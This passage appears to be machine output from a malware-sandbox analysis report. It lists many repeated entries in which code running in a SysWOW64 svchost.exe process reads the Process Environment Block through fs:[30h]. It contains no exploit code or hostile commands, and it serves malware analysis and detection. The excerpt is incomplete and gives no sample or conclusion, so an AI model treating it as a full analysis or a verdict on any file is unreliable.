            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035403E9 mov eax, dword ptr fs:[00000030h]4_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528397 mov eax, dword ptr fs:[00000030h]4_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528397 mov eax, dword ptr fs:[00000030h]4_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528397 mov eax, dword ptr fs:[00000030h]4_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E388 mov eax, dword ptr fs:[00000030h]4_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E388 mov eax, dword ptr fs:[00000030h]4_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352E388 mov eax, dword ptr fs:[00000030h]4_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355438F mov eax, dword ptr fs:[00000030h]4_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355438F mov eax, dword ptr fs:[00000030h]4_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A250 mov eax, dword ptr fs:[00000030h]4_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536259 mov eax, dword ptr fs:[00000030h]4_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B8243 mov eax, dword ptr fs:[00000030h]4_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B8243 mov ecx, dword ptr fs:[00000030h]4_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035E0274 mov eax, dword ptr fs:[00000030h]4_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534260 mov eax, dword ptr fs:[00000030h]4_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534260 mov eax, dword ptr fs:[00000030h]4_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534260 mov eax, dword ptr fs:[00000030h]4_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352826B mov eax, dword ptr fs:[00000030h]4_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352823B mov eax, dword ptr fs:[00000030h]4_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h]4_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h]4_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h]4_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h]4_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A2C3 mov eax, dword ptr fs:[00000030h]4_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035402E1 mov eax, dword ptr fs:[00000030h]4_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035402E1 mov eax, dword ptr fs:[00000030h]4_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035402E1 mov eax, dword ptr fs:[00000030h]4_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E284 mov eax, dword ptr fs:[00000030h]4_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356E284 mov eax, dword ptr fs:[00000030h]4_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B0283 mov eax, dword ptr fs:[00000030h]4_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B0283 mov eax, dword ptr fs:[00000030h]4_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B0283 mov eax, dword ptr fs:[00000030h]4_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035402A0 mov eax, dword ptr fs:[00000030h]4_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035402A0 mov eax, dword ptr fs:[00000030h]4_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov ecx, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C62A0 mov eax, dword ptr fs:[00000030h]4_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C156 mov eax, dword ptr fs:[00000030h]4_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C8158 mov eax, dword ptr fs:[00000030h]4_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536154 mov eax, dword ptr fs:[00000030h]4_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03536154 mov eax, dword ptr fs:[00000030h]4_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C4144 mov eax, dword ptr fs:[00000030h]4_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C4144 mov eax, dword ptr fs:[00000030h]4_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C4144 mov ecx, dword ptr fs:[00000030h]4_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C4144 mov eax, dword ptr fs:[00000030h]4_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C4144 mov eax, dword ptr fs:[00000030h]4_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DA118 mov ecx, dword ptr fs:[00000030h]4_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DA118 mov eax, dword ptr fs:[00000030h]4_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DA118 mov eax, dword ptr fs:[00000030h]4_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DA118 mov eax, dword ptr fs:[00000030h]4_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F0115 mov eax, dword ptr fs:[00000030h]4_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov ecx, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov ecx, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov ecx, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov eax, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035DE10E mov ecx, dword ptr fs:[00000030h]4_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03560124 mov eax, dword ptr fs:[00000030h]4_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_036061E5 mov eax, dword ptr fs:[00000030h]4_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE1D0 mov eax, dword ptr fs:[00000030h]4_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE1D0 mov eax, dword ptr fs:[00000030h]4_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]4_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE1D0 mov eax, dword ptr fs:[00000030h]4_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE1D0 mov eax, dword ptr fs:[00000030h]4_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F61C3 mov eax, dword ptr fs:[00000030h]4_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F61C3 mov eax, dword ptr fs:[00000030h]4_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035601F8 mov eax, dword ptr fs:[00000030h]4_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B019F mov eax, dword ptr fs:[00000030h]4_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B019F mov eax, dword ptr fs:[00000030h]4_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B019F mov eax, dword ptr fs:[00000030h]4_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B019F mov eax, dword ptr fs:[00000030h]4_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A197 mov eax, dword ptr fs:[00000030h]4_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A197 mov eax, dword ptr fs:[00000030h]4_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A197 mov eax, dword ptr fs:[00000030h]4_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03570185 mov eax, dword ptr fs:[00000030h]4_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EC188 mov eax, dword ptr fs:[00000030h]4_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035EC188 mov eax, dword ptr fs:[00000030h]4_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4180 mov eax, dword ptr fs:[00000030h]4_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4180 mov eax, dword ptr fs:[00000030h]4_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03532050 mov eax, dword ptr fs:[00000030h]4_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B6050 mov eax, dword ptr fs:[00000030h]4_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355C073 mov eax, dword ptr fs:[00000030h]4_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E016 mov eax, dword ptr fs:[00000030h]4_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E016 mov eax, dword ptr fs:[00000030h]4_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E016 mov eax, dword ptr fs:[00000030h]4_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E016 mov eax, dword ptr fs:[00000030h]4_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4000 mov ecx, dword ptr fs:[00000030h]4_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D2000 mov eax, dword ptr fs:[00000030h]4_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6030 mov eax, dword ptr fs:[00000030h]4_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A020 mov eax, dword ptr fs:[00000030h]4_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C020 mov eax, dword ptr fs:[00000030h]4_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B20DE mov eax, dword ptr fs:[00000030h]4_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352C0F0 mov eax, dword ptr fs:[00000030h]4_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035720F0 mov ecx, dword ptr fs:[00000030h]4_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035380E9 mov eax, dword ptr fs:[00000030h]4_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B60E0 mov eax, dword ptr fs:[00000030h]4_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353208A mov eax, dword ptr fs:[00000030h]4_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F60B8 mov eax, dword ptr fs:[00000030h]4_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F60B8 mov ecx, dword ptr fs:[00000030h]4_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C80A8 mov eax, dword ptr fs:[00000030h]4_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530750 mov eax, dword ptr fs:[00000030h]4_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE75D mov eax, dword ptr fs:[00000030h]4_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572750 mov eax, dword ptr fs:[00000030h]4_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572750 mov eax, dword ptr fs:[00000030h]4_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4755 mov eax, dword ptr fs:[00000030h]4_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356674D mov esi, dword ptr fs:[00000030h]4_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356674D mov eax, dword ptr fs:[00000030h]4_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356674D mov eax, dword ptr fs:[00000030h]4_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538770 mov eax, dword ptr fs:[00000030h]4_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540770 mov eax, dword ptr fs:[00000030h]4_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530710 mov eax, dword ptr fs:[00000030h]4_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03560710 mov eax, dword ptr fs:[00000030h]4_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C700 mov eax, dword ptr fs:[00000030h]4_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356273C mov eax, dword ptr fs:[00000030h]4_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356273C mov ecx, dword ptr fs:[00000030h]4_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356273C mov eax, dword ptr fs:[00000030h]4_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AC730 mov eax, dword ptr fs:[00000030h]4_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C720 mov eax, dword ptr fs:[00000030h]4_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C720 mov eax, dword ptr fs:[00000030h]4_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353C7C0 mov eax, dword ptr fs:[00000030h]4_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B07C3 mov eax, dword ptr fs:[00000030h]4_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035347FB mov eax, dword ptr fs:[00000030h]4_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035347FB mov eax, dword ptr fs:[00000030h]4_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035527ED mov eax, dword ptr fs:[00000030h]4_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035527ED mov eax, dword ptr fs:[00000030h]4_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035527ED mov eax, dword ptr fs:[00000030h]4_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE7E1 mov eax, dword ptr fs:[00000030h]4_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D678E mov eax, dword ptr fs:[00000030h]4_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035307AF mov eax, dword ptr fs:[00000030h]4_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354C640 mov eax, dword ptr fs:[00000030h]4_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03562674 mov eax, dword ptr fs:[00000030h]4_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F866E mov eax, dword ptr fs:[00000030h]4_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035F866E mov eax, dword ptr fs:[00000030h]4_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A660 mov eax, dword ptr fs:[00000030h]4_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A660 mov eax, dword ptr fs:[00000030h]4_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03572619 mov eax, dword ptr fs:[00000030h]4_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE609 mov eax, dword ptr fs:[00000030h]4_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354260B mov eax, dword ptr fs:[00000030h]4_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0354E627 mov eax, dword ptr fs:[00000030h]4_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03566620 mov eax, dword ptr fs:[00000030h]4_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568620 mov eax, dword ptr fs:[00000030h]4_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353262C mov eax, dword ptr fs:[00000030h]4_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A6C7 mov eax, dword ptr fs:[00000030h]4_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE6F2 mov eax, dword ptr fs:[00000030h]4_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE6F2 mov eax, dword ptr fs:[00000030h]4_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE6F2 mov eax, dword ptr fs:[00000030h]4_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE6F2 mov eax, dword ptr fs:[00000030h]4_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B06F1 mov eax, dword ptr fs:[00000030h]4_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B06F1 mov eax, dword ptr fs:[00000030h]4_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534690 mov eax, dword ptr fs:[00000030h]4_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534690 mov eax, dword ptr fs:[00000030h]4_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035666B0 mov eax, dword ptr fs:[00000030h]4_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C6A6 mov eax, dword ptr fs:[00000030h]4_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538550 mov eax, dword ptr fs:[00000030h]4_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538550 mov eax, dword ptr fs:[00000030h]4_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356656A mov eax, dword ptr fs:[00000030h]4_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356656A mov eax, dword ptr fs:[00000030h]4_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356656A mov eax, dword ptr fs:[00000030h]4_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6500 mov eax, dword ptr fs:[00000030h]4_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604500 mov eax, dword ptr fs:[00000030h]4_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03540535 mov eax, dword ptr fs:[00000030h]4_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h]4_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h]4_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h]4_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E53E mov eax, dword ptr fs:[00000030h]4_2_0355E53E
